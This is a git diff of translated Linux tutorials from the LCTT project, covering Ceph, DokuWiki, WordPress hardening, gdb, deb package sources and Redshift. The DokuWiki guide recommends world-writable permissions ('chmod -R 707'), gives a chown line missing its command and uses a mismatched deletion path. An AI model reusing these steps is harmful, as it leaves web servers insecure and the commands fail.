文件系统的 /dev/sdb 分区。 ``` sudo fdisk -s /dev/sdb @@ -317,31 +307,30 @@ sudo blkid -o value -s TYPE /dev/sdb ![Format partition ceph OSD nodes](https://www.howtoforge.com/images/how-to-install-a-ceph-cluster-on-ubuntu-16-04/6.png) ][13] -### 第5步 - 创建 Ceph 集群 +### 第 5 步 - 创建 Ceph 集群 -在这步,我们将从 ceph-admin 安装 Ceph 到所有节点。马上开始,登录到 ceph-admin 节点。 +在这步,我们将从 ceph-admin 安装 Ceph 到所有节点。马上开始,先登录到 ceph-admin 节点。 ``` ssh root@ceph-admin su - cephuser ``` -**在 ceph-admin 节点上安装 ceph-deploy** +#### 在 ceph-admin 节点上安装 ceph-deploy 首先我们已经在系统上安装了 python 和 python-pip。现在我们需要从 pypi python 仓库安装 Ceph 部署工具 '**ceph-deploy**'。 -Install ceph-deploy on the ceph-admin node with the pip command. 用 pip 命令在 ceph-admin 节点安装 ceph-deploy 。 ``` sudo pip install ceph-deploy ``` -注意: 确保所有节点都已经更新. +注意: 确保所有节点都已经更新。 ceph-deploy 工具已经安装完毕后,为 Ceph 集群配置创建一个新目录。 -**创建一个新集群** +#### 创建一个新集群 创建一个新集群目录。 @@ -350,25 +339,25 @@ mkdir cluster cd cluster/ ``` -下一步,用 '**ceph-deploy**' 命令通过定义监控节点 '**mon1**' 创建一个新集群。 +下一步,用 `ceph-deploy` 命令通过定义监控节点 mon1 创建一个新集群。 ``` ceph-deploy new mon1 ``` -命令将在集群目录生成 Ceph 集群配置文件 'ceph.conf'。 +命令将在集群目录生成 Ceph 集群配置文件 `ceph.conf`。 [ ![Generate new ceph cluster configuration](https://www.howtoforge.com/images/how-to-install-a-ceph-cluster-on-ubuntu-16-04/7.png) ][14] -用 vim 编辑 ceph.conf。 +用 vim 编辑 `ceph.conf`。 ``` vim ceph.conf ``` -在 [global] 块下,粘贴下面的配置。 +在 `[global]` 块下,粘贴下面的配置。 ``` # Your network address @@ -376,9 +365,9 @@ public network = 10.0.15.0/24 osd pool default size = 2 ``` -保存文件并推出编辑器。 +保存文件并退出编辑器。 -**安装 Ceph 到所有节点** +#### 安装 Ceph 到所有节点 现在用一个命令从 ceph-admin 节点安装 Ceph 到所有节点。 @@ -386,7 +375,7 @@ osd pool default size = 2 ceph-deploy install ceph-admin ceph-osd1 ceph-osd2 ceph-osd3 mon1 ``` -命令将自动安装 Ceph 到所有节点:mon1,osd1-3 和 ceph-admin - 安装将花一些时间。 +命令将自动安装 Ceph 到所有节点:mon1、osd1-3 和 ceph-admin - 安装将花一些时间。 现在到 mon1 节点部署监控节点。 @@ -404,9 +393,9 @@ ceph-deploy gatherkeys mon1 ![Deploy key ceph](https://www.howtoforge.com/images/how-to-install-a-ceph-cluster-on-ubuntu-16-04/8.png) ][15] -**增加 OSDS 到集群** +#### 增加 OSD 到集群 -在所有节点上安装了 Ceph 之后,现在我们可以增加 OSD 守护进程到集群。OSD 守护进程将在磁盘 /dev/sdb 分区上创建数据和日志 。 +在所有节点上安装了 Ceph 之后,现在我们可以增加 OSD 守护进程到该集群。OSD 守护进程将在磁盘 /dev/sdb 分区上创建数据和日志 。 检查所有 osd 节点的 /dev/sdb 磁盘可用性。 @@ -420,7 +409,7 @@ ceph-deploy disk list ceph-osd1 ceph-osd2 ceph-osd3 你将看见我们之前创建 XFS 格式的 /dev/sdb。 -下面,在所有节点用 zap 选项删除分区表。 +下面,在所有 OSD 节点上用 zap 选项删除该分区表。 ``` ceph-deploy disk zap ceph-osd1:/dev/sdb ceph-osd2:/dev/sdb ceph-osd3:/dev/sdb @@ -428,13 +417,13 @@ ceph-deploy disk zap ceph-osd1:/dev/sdb ceph-osd2:/dev/sdb ceph-osd3:/dev/sdb 这个命令将删除所有 Ceph OSD 节点的 /dev/sdb 上的数据。 -现在准备所有 OSD 节点并确保结果没有报错。 +现在准备所有 OSD 节点,请确保结果没有报错。 ``` ceph-deploy osd prepare ceph-osd1:/dev/sdb ceph-osd2:/dev/sdb ceph-osd3:/dev/sdb ``` -当你看到 ceph-osd1-3 结果已经准备好 OSD 使用,然后命令已经成功。 +当你看到 ceph-osd1-3 结果已经准备好供 OSD 使用,就表明命令已经成功。 [ ![Prepare the ceph-osd nodes](https://www.howtoforge.com/images/how-to-install-a-ceph-cluster-on-ubuntu-16-04/10.png) @@ -486,17 +475,17 @@ sudo chmod 644 /etc/ceph/ceph.client.admin.keyring Ceph 集群在 Ubuntu 16.04 已经创建完成。 -### 第6步 - 测试 Ceph +### 第 6 步 - 测试 Ceph -在第4步,我们已经安装并创建了一个新 Ceph 集群,然后添加了 OSDS 节点到集群。现在我们应该测试集群确保它如期工作。 +在第 4 步,我们已经安装并创建了一个新 Ceph 集群,然后添加了 OSD 节点到集群。现在我们应该测试集群确保它如期工作。 -从 ceph-admin 节点,登录到 Ceph 监控服务器 '**mon1**'。 +从 ceph-admin 节点,登录到 Ceph 监控服务器 mon1。 ``` ssh mon1 ``` -运行下面命令来检查集群健康。 +运行下面命令来检查集群是否健康。 ``` sudo ceph health @@ -514,7 +503,7 @@ sudo ceph -s ![Ceph Cluster Status](https://www.howtoforge.com/images/how-to-install-a-ceph-cluster-on-ubuntu-16-04/13.png) ][20] -确保 Ceph 健康是 **OK** 并且有一个监控节点 '**mon1**' IP 地址为 '**10.0.15.11**'。有 **3 OSD** 服务器都是 **up** 状态并且正在运行,可用磁盘空间为 **45GB** - 3x15GB Ceph 数据 OSD 分区。 +确保 Ceph 健康状态是 `OK` 的,有一个监控节点 mon1 IP 地址为 '**10.0.15.11**'。有 **3 个 OSD** 服务器都是 **up** 状态并且正在运行,可用磁盘空间为 **45GB** - 3x15GB 的 Ceph 数据 OSD 分区。 我们在 Ubuntu 16.04 建立一个新 Ceph 集群成功。 @@ -528,7 +517,7 @@ via: https://www.howtoforge.com/tutorial/how-to-install-a-ceph-cluster-on-ubuntu 作者:[Muhammad Arul][a] 译者:[wyangsun](https://github.com/wyangsun) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/published/20170114 Build your own wiki on Ubuntu with DokuWiki.md b/published/20170114 Build your own wiki on Ubuntu with DokuWiki.md new file mode 100644 index 0000000000..219f417556 --- /dev/null +++ b/published/20170114 Build your own wiki on Ubuntu with DokuWiki.md @@ -0,0 +1,128 @@ +在 Ubuntu 上使用 DokuWiki 构建你自己的 wiki +============================================================ + +我们在使用 [DokuWiki][2],它是一个真棒的工具。我们团队有一个内部知识库,我们使用 DokuWiki 存储我们的所有评论、教程等。它很简单,并且易于安装和使用。在这篇文章中,我们将展示如何在 Ubuntu 16.04 服务器上安装 DokuWiki。 + +### 需求 + +DokuWiki 不需要太多依赖,因为它不需要数据库。这里是 DokuWiki 的要求: + +* PHP 5.3.4 或更高版本(建议使用 PHP 7+) +* 一台 web 服务器(Apache/Nginx/任何其他) +* 一台 VPS。[买一台便宜的托管 VPS][1],那么你就不必这样做了。你只需与支持团队联系,他们将会为您安装。 + +### 指导 + +在你开始之前,你应该升级你的系统。运行下面的命令: + +``` +sudo apt-get update && sudo apt-get upgrade +``` + +### 安装 Apache + +我们需要一台用于我们 wiki 的 web 服务器。我们在本教程中使用 Apache,但你也可以使用 Nginx 或任何其他 web 服务器。用下面的命令安装apache: + +``` +apt-get install apache2 +``` + +### 安装 PHP7 和模块 + +接下来,如果你还没有安装 PHP,你应该先安装 PHP。在本教程中,我们使用 PHP7。所以请使用下面的命令安装 PHP7 和一些其他 PHP 模块: + +``` +apt-get install php7.0-fpm php7.0-cli php-apcu php7.0-gd php7.0-xml php7.0-curl php7.0-json php7.0-mcrypt php7.0-cgi php7.0 libapache2-mod-php7.0 +``` + +### 下载安装 DokuWiki + +下面就来到主要部分了 - 实际安装 DokuWiki。 + +首先,为你的 DokuWiki 创建一个目录: + +``` +mkdir -p /var/www/thrwiki +``` + +进入你刚才创建的目录: + +``` +cd /var/www/thrwiki +``` + +运行下面的命令来下载最新(稳定)的 DokuWiki: + +``` +wget http://download.dokuwiki.org/src/dokuwiki/dokuwiki-stable.tgz +``` + +解压 .tgz 文件: + +``` +tar xvf dokuwiki-stable.tgz +``` + +更改文件/文件夹权限: + +``` +www-data:www-data -R /var/www/thrwiki +chmod -R 707 /var/www/thrwiki +``` + +### 为 DokuWiki 配置 Apache + +为你的 DokuWiki 创建一个 .conf 文件(我们把它命名为 `thrwiki.conf`,但是你可以把它命名成任何你想要的),并用你喜欢的文本编辑器打开。我们使用 nano: + +``` +touch /etc/apache2/sites-available/thrwiki.conf +ln -s /etc/apache2/sites-available/thrwiki.conf /etc/apache2/sites-enabled/thrwiki.conf +nano /etc/apache2/sites-available/thrwiki.conf +``` + +下面是 thrwiki.conf 中的内容: + +``` + +ServerAdmin wikiadmin@thishosting.rocks +DocumentRoot /var/www/thrwiki/ +ServerName wiki.thishosting.rocks +ServerAlias www.wiki.thishosting.rocks + +Options FollowSymLinks +AllowOverride All +Order allow,deny +allow from all + +ErrorLog /var/log/apache2/wiki.thishosting.rocks-error_log +CustomLog /var/log/apache2/wiki.thishosting.rocks-access_log common + +``` + +编辑与你服务器相关的行。将 `wikiadmin@thishosting.rocks`、`wiki.thishosting.rocks` 替换成你自己的数据,重启 apache 使更改生效: + +``` +systemctl restart apache2.service +``` + +就是这样了。现在已经配置完成了。现在你可以继续通过前端页面 http://wiki.thishosting.rocks/install.php 安装配置 DokuWiki 了。安装完成后,你可以用下面的命令删除 install.php: + +``` +rm -f /var/www/html/thrwiki/install.php +``` + +如果你需要任何帮助,请随意留下评论。 + +-------------------------------------------------------------------------------- + +via: https://thishosting.rocks/build-your-own-wiki-on-ubuntu-with-dokuwiki/ + +作者:[thishostrocks.com][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://twitter.com/thishostrocks +[1]:https://thishosting.rocks/best-cheap-managed-vps/ +[2]:https://github.com/splitbrain/dokuwiki diff --git a/published/20170116 5 Essential Tips for Securing Your WordPress Sites.md b/published/20170116 5 Essential Tips for Securing Your WordPress Sites.md new file mode 100644 index 0000000000..a003765c3e --- /dev/null +++ b/published/20170116 5 Essential Tips for Securing Your WordPress Sites.md @@ -0,0 +1,62 @@ +5 个让你的 WordPress 网站安全的技巧 +============================================================ + +![](https://www.rosehosting.com/blog/wp-content/uploads/2017/01/tips-for-securing-wp.jpg) + +WordPress 是迄今为止最流行的博客平台。 + +正由于它的流行,也因此带来了正面和负面的影响。事实上,几乎每个人都使用它,使它更容易被发现漏洞。WordPress 的开发人员做了很多工作,一旦新的缺陷被发现,就会发布修复和补丁,但这并不意味着你可以安装完就置之脑后。 + +在这篇文章中,我们将提供一些最常见的保护和强化 WordPress 网站的方法。 + +### 在登录后台时总是使用 SSL + +不用说的是,如果你并不打算只是做一个随意的博客,你应该总是使用 SSL。不使用加密连接登录到你的网站会暴露你的用户名和密码。任何人嗅探流量都可能会发现你的密码。如果你使用 WiFi 上网或者连接到一个公共热点,那么你被黑的几率更高,这是特别真实的。你可以从[这里][1]获取受信任的免费 SSL 证书。 + +### 精心挑选附加的插件 + +由第三方开发人员所开发,每个插件的质量和安全性总是值得怀疑,并且它仅取决于其开发人员的经验。当安装任何额外的插件时,你应该仔细选择,并考虑其受欢迎程度以及插件的维护频率。应该避免维护不良的插件,因为它们更容易出现易于被利用的错误和漏洞。 + +此主题也是上一个关于 SSL 主题的补充,因为许多插件包含的脚本会发出不安全连接(HTTP)的请求。只要你的网站通过 HTTP 访问,一切似乎很好。但是,一旦你决定使用加密并强制使用 SSL 访问,则会立即导致网站的功能被破坏,因为当你使用 HTTPS 访问其他网站时,这些插件上的脚本将继续通过 HTTP 提供请求。 + +### 安装 Wordfence + +Wordfence 是由 Feedjit Inc. 开发的,Wordfence 是目前最流行的 WordPress 安全插件,并且是每个严肃的 WordPress 网站必备的,特别是那些使用 [WooCommerce][2] 或其它的 WordPress 电子商务平台的网站。 + +Wordfence 不只是一个插件,因为它提供了一系列加强您的网站的安全功能。它具有 web 程序防火墙、恶意软件扫描、实时流量分析器和各种其它工具,它们可以提高你网站的安全性。防火墙将默认阻止恶意登录尝试,甚至可以配置为按照 IP 地址范围来阻止整个国家/地区的访问。我们真正喜欢 Wordfence 的原因是,即使你的网站因为某些原因被侵害,例如恶意脚本,Wordfence 可以在安装以后扫描和清理你的网站上被感染的文件。 + +该公司提供这个插件的免费和付费订阅计划,但即使是免费计划,你的网站仍将获得令人满意的水平。 + +### 用额外的密码锁住 /wp-admin 和 /wp-login.php + +保护你的 WordPress 后端的另一个步骤是使用额外的密码保护任何除了你以外不打算让任何人使用的目录(即URL)。 /wp-admin 目录属于此关键目录列表。 如果你不允许普通用户登录 WordPress,你应该使用密码限制对 wp.login.php 文件的访问。无论是使用 [Apache][3] 还是 [Nginx][4],你都可以访问这两篇文章,了解如何额外保护 WordPress 安装。 + +### 禁用/停止用户枚举 + +这是攻击者发现你网站上的有效用户名的一种相当简单的方法(即找出管理员用户名)。那么它是如何工作的?这很简单。在任何 WordPress 站点上的主要 URL 后面跟上 `/?author=1` 即可。 例如:`wordpressexample.com/?author=1`。 + +要保护您的网站免受此影响,只需安装[停止用户枚举][5]插件。 + +### 禁用 XML-RPC + +RPC 代表远程过程调用,它可以用来从位于网络上另一台计算机上的程序请求服务的协议。对于 WordPress 来说,XML-RPC 允许你使用流行的网络博客客户端(如 Windows Live Writer)在你的 WordPress 博客上发布文章,如果你使用 WordPress 移动应用程序那么也需要它。 XML-RPC 在早期版本中被禁用,但是从 WordPress 3.5 时它被默认启用,这让你的网站面临更大的攻击可能。虽然各种安全研究人员建议这不是一个大问题,但如果你不打算使用网络博客客户端或 WP 的移动应用程序,你应该禁用 XML-RPC 服务。 + +有多种方法可以做到这一点,最简单的是安装[禁用 XML-RPC][6]插件。 + +-------------------------------------------------------------------------------- + +via: https://www.rosehosting.com/blog/5-tips-for-securing-your-wordpress-sites/ + +作者:[rosehosting.com][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:rosehosting.com +[1]:https://letsencrypt.org/ +[2]:https://www.rosehosting.com/woocommerce-hosting.html +[3]:https://www.rosehosting.com/blog/password-protect-a-directory-using-htaccess/ +[4]:https://www.rosehosting.com/blog/password-protecting-directories-with-nginx/ +[5]:https://wordpress.org/plugins/stop-user-enumeration/ +[6]:https://wordpress.org/plugins/disable-xml-rpc/ diff --git a/published/20170116 How to debug C programs in Linux using gdb.md b/published/20170116 How to debug C programs in Linux using gdb.md new file mode 100644 index 0000000000..03e0b78219 --- /dev/null +++ b/published/20170116 How to debug C programs in Linux using gdb.md @@ -0,0 +1,193 @@ +在 Linux 中如何使用 gdb 调试 C 程序 +============================================================ + +无论多么有经验的程序员,开发的任何软件都不可能完全没有 bug。因此,排查及修复 bug 成为软件开发周期中最重要的任务之一。有许多办法可以排查 bug(测试、代码自审等等),但是还有一些专用软件(称为调试器)可以帮助准确定位问题的所在,以便进行修复。 + +如果你是 C/C++ 程序员,或者使用 Fortran 和 Modula-2 编程语言开发软件,那么你将会很乐意知道有这么一款优秀的调试器 - [GDB][4] - 可以帮你更轻松地调试代码 bug 以及其它问题。在这篇文章中,我们将讨论一下 GDB 调试器的基础知识,包括它提供的一些有用的功能/选项。 + +在我们开始之前,值得一提的是,文章中的所有说明和示例都已经在 Ubuntu 14.04 LTS 中测试过。教程中的示例代码都是 C 语言写的;使用的 shell 为 bash(4.3.11);GDB 版本为 7.7.1。 + +### GDB 调试器基础 + +通俗的讲,GDB 可以让你看到程序在执行过程时的内部流程,并帮你明确问题的所在。我们将在下一节通过一个有效的示例来讨论 GDB 调试器的用法,但在此之前,我们先来探讨一些之后对你有帮助的基本要点。 + +首先,为了能够顺利使用类似 GDB 这样的调试器,你必须以指定的方式编译程序,让编译器产生调试器所需的调试信息。例如,在使用 gcc 编译器(我们将在本教程之后的章节用它来编译 C 程序示例)编译代码的时候,你需要使用 `-g` 命令行选项。 + +想要了解 gcc 编译器手册页中关于 `-g` 命令行选项相关的内容,请看[这里][5]。 + +下一步,确保在你的系统中已经安装 GDB 调试器。如果没有安装,而且你使用的是基于 Debian 的系统(如 Ubuntu),那么你就可以使用以下命令轻松安装该工具: + +``` +sudo apt-get install gdb +``` + +在其他发行版上的安装方法,请看[这里][6]。 + +现在,当你按照上述的方式编译完程序(`gcc -g` 命令行选项),同时也已经安装好 GDB 调试器,那么你就可以使用以下命令让程序在调试模式中运行: + +``` +gdb [可执行程序的名称] +``` + +这样做会初始化 GDB 调试器,但你的可执行程序此时还不会被启动。在这个时候你就可以定义调试相关的设置。例如,你可以在特定行或函数中设置一个断点让 GDB 在该行暂停程序的执行。 + +接着,为了启动你的程序,你必须输入执行以下 gdb 命令: + +``` +run +``` + +在这里,值得一提的是,如果你的程序需要一些命令行参数,那么你可以在这里指定这些参数。例如: + +``` +run [arguments] +``` + +GDB 提供了很多有用的命令,在调试的时候总是能派的上用场。我们将在下一节讨论其中一部分命令。 + +### GDB 调试器用例 + +现在我们对 GDB 及其用法有了基本的概念。因此,让我们举例来应用所学的知识。这是一段示例代码: + +``` +#include + +int main() +{ + int out = 0, tot = 0, cnt = 0; + int val[] = {5, 54, 76, 91, 35, 27, 45, 15, 99, 0}; + + while(cnt < 10) + { + out = val[cnt]; + tot = tot + 0xffffffff/out; + cnt++; + } + + printf("\n Total = [%d]\n", tot); + return 0; +} +``` + +简单说明一下这段代码要做什么事。获取 `val` 数组中每一个值,将其赋值给 `out` 变量,然后将 `tot` 之前的值与 `0xffffffff/out` 的结果值累加,赋值给 `tot` 变量。 + +这里遇到的问题是,当执行这段代码编译后的可执行程序时,产生以下错误: + +``` +$ ./gdb-test  +Floating point exception (core dumped) +``` + +因此,要调试这段代码,第一步是使用 `-g` 选项编译程序。命令如下: + +``` +gcc -g -Wall gdb-test.c -o gdb-test +``` + +接着,让我们运行 GDB 调试器并指定要调试的可执行程序。命令如下: + +``` +gdb ./gdb-test  +``` + +现在,我刚才得到的错误是 `Floating point exception`,大部分人可能已经知道,这是因为 `n % x`,当 x 为 0 时导致的错误。所以,考虑到这一点,我在 11 行代码除法运算的位置处添加了一个断点。如下: + +``` +(gdb) break 11 +``` + +注意 `(gdb)` 是调试器的提示信息,我只输入了 `break 11` 命令。 + +现在,让 GDB 开始运行程序: + +``` +run +``` + +当断点第一次被命中时,GDB 显示如下输出: + +``` +Breakpoint 1, main () at gdb-test.c:11 +11 tot = tot + 0xffffffff/out; +(gdb) +``` + +正如你所看到的那样,调试器会显示断点所在的行代码。现在,让我们打印出此时 `out` 的值。如下: + +``` +(gdb) print out +$1 = 5 +(gdb) +``` + +如上所示,值 `5` 被打印出来了。这个时候一切都还是正常的。让调试器继续执行程序直到命中下一个断点,可以通过使用 `c` 命令来完成: + +``` +c   +``` + +重复上述操作,直到 `out` 值变为 `0` 时。 + +``` +... +... +... +Breakpoint 1, main () at gdb-test.c:11 +11 tot = tot + 0xffffffff/out; +(gdb) print out +$2 = 99 +(gdb) c +Continuing. + +Breakpoint 1, main () at gdb-test.c:11 +11 tot = tot + 0xffffffff/out; +(gdb) print out +$3 = 0 +(gdb) +``` + +现在,为了进一步确认问题,我使用 GDB 的 `s`(或 `step`) 命令代替 `c` 命令。因为,我只想让当前程序在第 11 行之后暂停,再一步步执行,看看这个时候是否会发生崩溃。 + +以下是执行之后输出信息: + +``` +(gdb) s + +Program received signal SIGFPE, Arithmetic exception. +0x080484aa in main () at gdb-test.c:11 +11 tot = tot + 0xffffffff/out; +``` + +是的,如上输出的第一行内容所示,这就是抛出异常的地方。当我再次尝试运行 `s` 命令时,问题最终也得到了确认: + +``` +(gdb) s + +Program terminated with signal SIGFPE, Arithmetic exception. +The program no longer exists. +``` + +通过这种方式,你就可以使用 GDB 调试你的程序。 + +### 总结 + +GDB 提供了很多功能供用户研究和使用,在这里,我们仅仅只介绍了很少一部分内容。通过 GDB 的手册页可以进一步了解这个工具,当你在调试代码的时候,尝试使用一下它。GDB 调试器有一定的学习难度,但是它很值得你下功夫学习。 + + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/how-to-debug-c-programs-in-linux-using-gdb/ + +作者:[Ansh][a] +译者:[zhb127](https://github.com/zhb127) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/how-to-debug-c-programs-in-linux-using-gdb/ +[1]:https://www.howtoforge.com/tutorial/how-to-debug-c-programs-in-linux-using-gdb/#gdb-debugger-basics +[2]:https://www.howtoforge.com/tutorial/how-to-debug-c-programs-in-linux-using-gdb/#gdb-usage-example +[3]:https://www.howtoforge.com/tutorial/how-to-debug-c-programs-in-linux-using-gdb/#conclusion +[4]:https://www.sourceware.org/gdb/ +[5]:https://linux.die.net/man/1/gcc +[6]:https://www.sourceware.org/gdb/download/ diff --git a/published/20170117 5 of the Best Places to Find DEBs Packages for Debian-Based Linux Distros.md b/published/20170117 5 of the Best Places to Find DEBs Packages for Debian-Based Linux Distros.md new file mode 100644 index 0000000000..25649fff0b --- /dev/null +++ b/published/20170117 5 of the Best Places to Find DEBs Packages for Debian-Based Linux Distros.md @@ -0,0 +1,74 @@ +5 个找到 deb 软件包的好地方 +============================================================ + ![](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/deb-packages.jpg "5 of the Best Places to Find DEBs Packages for Debian-Based Linux Distross") + +基于 Debian 的 Linux 发行版上有一个共同特点:为用户提供了很多可选的软件。当涉及到为 Linux 制作软件时,所有的大公司都首先瞄准这种类型的 Linux 发行版。甚至一些开发人员根本不打算为其他类型的 Linux 发行版打包,只做 DEB 包。 + +然而,这么多的开发人员针对此类 Linux 发行版开发并不意味着用户在寻找软件方面不会遇到问题。一般情况下,大多数 Debian 和 Ubuntu 用户都是自己在互联网上搜索 DEB 包。 + +因此,我们决定写一篇文章,它涵盖了五个最好的可以找到 DEB 软件包的网站。 这样基于 Debian 的 Linux 发行版的用户就能够更容易地找到他们需要的软件,而不是浪费时间在互联网上搜索。 + +### 1、 Launchpad + +[Launchpad][11] 是互联网上最大的基于 Debian 的软件包仓库。 为什么? 这是 PPA 所在的地方!Canonical 创建了这个服务,所以任何开发商(无论是大的或小的)都可以使用它,并且轻松地将其软件包分发给 Ubuntu 用户。 + +不幸的是,并不是所有基于 Debian 的 Linux 发行版都是 Ubuntu。但是,就算你的 Linux 发行版不使用 PPA,也并不意味着此服务无用。Launchpad 使得直接下载任何 Debian 软件包进行安装成为可能。 + +![debian-packages-launchpad](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/debian-packages-launchpad.jpg "debian-packages-launchpad") + +### 2、 Pkgs.org + +除了 Launchpad,[Pkgs.org][12] 可能是互联网上最大的查找 Debian 软件包的站点。如果一个 Linux 用户需要一个 deb,并且不能在它的发行版的软件包仓库中找到它,那它很可能在这个网站上找到。 + +![debian-packages-pkgs-org](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/debian-packages-pkgs-org.jpg "debian-packages-pkgs-org") + +### 3、 Getdeb + +[Getdeb][13] 是一个针对 Ubuntu 的项目,它托管了最新的 Ubuntu 版本的软件。这使它成为一个找 Debian 包的很好的地方。特别是如果用户使用的是 Ubuntu、Linux Mint、Elementary OS 和其他许多基于 Ubuntu 的 Linux 发行版上。此外,这些软件包甚至可以在 Debian 上工作! + +![debian-packages-get-deb](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/debian-packages-get-deb.jpg "debian-packages-get-deb") + +### 4、 RPM Seek + +即使 [RPM Seek][14] 声称是 “Linux RPM 包搜索引擎”,奇怪的是,它也可以搜索 DEB 包。如果你试图找到一个特定的 DEB 包,并且在其他地方都找过了,再检查下 RPM Seek 或许是一个好主意,因为它可能有你所需要的。 + + ![debian-packages-rpm-seek](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/debian-packages-rpm-seek.jpg "debian-packages-rpm-seek") + +### 5、 Open Suse Software + +[Open SUSE 构建服务(OSB)][15]是 Linux 上最知名的软件构建工具之一。有了它,开发人员可以轻松地将他们的代码为许多不同的 Linux 发行版打包。因此,OSB 的包搜索允许用户下载 DEB 文件。 + +更有趣的是,许多开发人员选择使用 OSB 分发他们的软件,因为它可以轻松地生成 RPM、DEB 等。如果用户急切需要 DEB,OSB 的服务很值得去看下。 + +![debian-packages-opensuse-build](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/debian-packages-opensuse-build.jpg "debian-packages-opensuse-build") + +### 总结 + +寻找 Linux 发行版的包可能是乏味的,有时令人沮丧。想必介绍的这些网站可以让基于 Debian 的 Linux 发行版的用户在获得他们需要的软件时候更加轻松。 + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/best-places-find-debs-packages/ + +作者:[Derrik Diener][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com/author/derrikdiener/ +[1]:https://www.maketecheasier.com/author/derrikdiener/ +[2]:https://www.maketecheasier.com/best-places-find-debs-packages/#comments +[3]:https://www.maketecheasier.com/category/linux-tips/ +[4]:http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.maketecheasier.com%2Fbest-places-find-debs-packages%2F +[5]:http://twitter.com/share?url=https%3A%2F%2Fwww.maketecheasier.com%2Fbest-places-find-debs-packages%2F&text=5+of+the+Best+Places+to+Find+DEBs+Packages+for+Debian-Based+Linux+Distros +[6]:mailto:?subject=5%20of%20the%20Best%20Places%20to%20Find%20DEBs%20Packages%20for%20Debian-Based%20Linux%20Distros&body=https%3A%2F%2Fwww.maketecheasier.com%2Fbest-places-find-debs-packages%2F +[7]:https://www.maketecheasier.com/add-paypal-wordpress/ +[8]:https://www.maketecheasier.com/keep-kids-videos-out-youtube-history/ +[9]:https://support.google.com/adsense/troubleshooter/1631343 +[10]:https://www.maketecheasier.com/find-rpms-for-redhat-based-distros/ +[11]:https://launchpad.net/ +[12]:https://pkgs.org/ +[13]:http://www.getdeb.net/welcome/ +[14]:http://www.rpmseek.com/index.html +[15]:https://build.opensuse.org/ diff --git a/published/20170118 Improve your sleep by using Redshift on Fedora.md b/published/20170118 Improve your sleep by using Redshift on Fedora.md new file mode 100644 index 0000000000..2eebb61eaf --- /dev/null +++ b/published/20170118 Improve your sleep by using Redshift on Fedora.md @@ -0,0 +1,88 @@ +在 Fedora 上使用 Redshift 改善睡眠 +=============================================== + +![redshift](https://cdn.fedoramagazine.org/wp-content/uploads/2017/01/redshift-945x400.png) + +大多数电子设备发射的蓝光被认为对我们的睡眠有负面影响。作为一个尝试,我们可以在黑暗中不再使用我们的电子设备,以改善我们的睡眠。然而,由于这对我们大多数人并不是很适合,更好的方法是根据你周围环境调整屏幕的色温。实现这一点的最流行的方法之一是使用 Redshift。 Redshift 的创建者 Jon Lund Steffensen 这样描述了他的程序: + +> Redshift 会根据你周围的环境调整屏幕的色温。如果你在夜间在屏幕前工作,它可以帮助你减少眼睛伤害。 + +Redshift 在 Fedora Workstation 上仅工作在 X11 会话中。所以如果你使用 Fedora 24,Redshift 可以工作在默认登录会话中。然而,在 Fedora 25 上,登录的默认会话是 Wayland,因此你将需要替代使用其 GNOME shell 扩展。注意,这个 GNOME Shell 扩展也适用于 X11 会话。 + +### Redshift 工具 + +#### 安装 + +Redshift 在 Fedora 的仓库中,因此我们使用下面的命令安装: + +``` +sudo dnf install redshift +``` + +该软件也提供了 GUI。要使用的话就安装 `redshift-gtk`。记住,这个工具只能在 X11 会话中使用: + +#### 使用 Redshift 工具 + +用像下面的命令在命令行中运行: + +``` +redshift -l 23.6980:133.8807 -t 5600:3400 +``` + +在以上命令中,`-l 23.6980:133.8807` 的意思是我们通知 Redshift 我们当前的位置是南纬 23.6980°,东经 133.8807°。 `-t 5600:3400` 表明你白天想要的色温是 5600,晚上是 3400。 + +色温与发射的蓝光的量成比例:较低的色温意味着较低量的蓝光。我喜欢在白天使用 5600K(6500K 是中性日光),在晚上使用 3400K(更低的色温让我觉得像盯着番茄一样),但你可以随意尝试。 + +如果你不指定位置,Redshift 会尝试使用 Geoclue 方法来确定你的位置坐标。如果此方法不起作用,你可以使用几个[网站][2]和在线地图来查找坐标。 + +![screenshot1](https://cdn.fedoramagazine.org/wp-content/uploads/2017/01/screenshot1.png) + +别忘记将 Redshift 设置为自动启动,查看 [Jon 的网站][3]来获取更多信息。 + +### Redshift GNOME Shell 扩展 + +该程序不能在运行 Wayland 显示服务器(这是 Fedora 25 中的标准)的环境中工作。幸运的是,这里有一个方便的 GNOME Shell 扩展可以做到同样的工作。要安装它,请运行以下命令: + +``` +sudo dnf copr enable mystro256/gnome-redshift +sudo dnf install gnome-shell-extension-redshift +``` + +从 COPR 仓库安装后,注销并重新登录你的 Fedora Workstation,然后在 GNOME Tweak 工具中启用它。关于更多信息,请查看 gnome-redshift 的 [copr 仓库][4]或 [github 仓库][5]。 + +启用扩展后,GNOME shell 右上角会出现一个小小的太阳(或月亮)图标。该扩展还提供了一个设置对话框来调整 redshift 和温度的时间。 + 